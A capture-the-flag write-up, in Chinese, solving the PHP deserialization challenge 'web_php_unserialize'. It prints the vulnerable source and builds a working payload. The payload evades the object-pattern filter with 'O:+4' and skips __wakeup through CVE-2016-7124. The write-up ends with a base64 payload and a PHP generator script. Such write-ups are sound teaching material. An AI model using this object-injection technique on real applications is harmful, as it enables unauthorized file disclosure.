web_php_unserialize
这道题涉及的知识点是php反序列化
看题:
进来给了源码
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
?>
下面构造参数var:
初始序列化字符串O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
-
替换掉
o/c:数字- 这里用
+4替换掉4即可 O:+4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
- 这里用
-
绕过
__wakeup函数- 这里用
2替换1,利用了CVE-2016-7124漏洞,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
- 这里用
-
使用base64编码
TzorNDoiRGVtbyI6Mjp7czoxMDoiRGVtb2ZpbGUiO3M6ODoiZmw0Zy5waHAiO30=
php脚本
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a = new Demo('fl4g.php');
$b = serialize($a);
echo $b;
echo '<br>';
$c = str_replace('O:4', 'O:+4', $b);
$c= str_replace(':1:', ':2:', $c);
echo $c;
echo '<br>';
echo base64_encode($c);
?>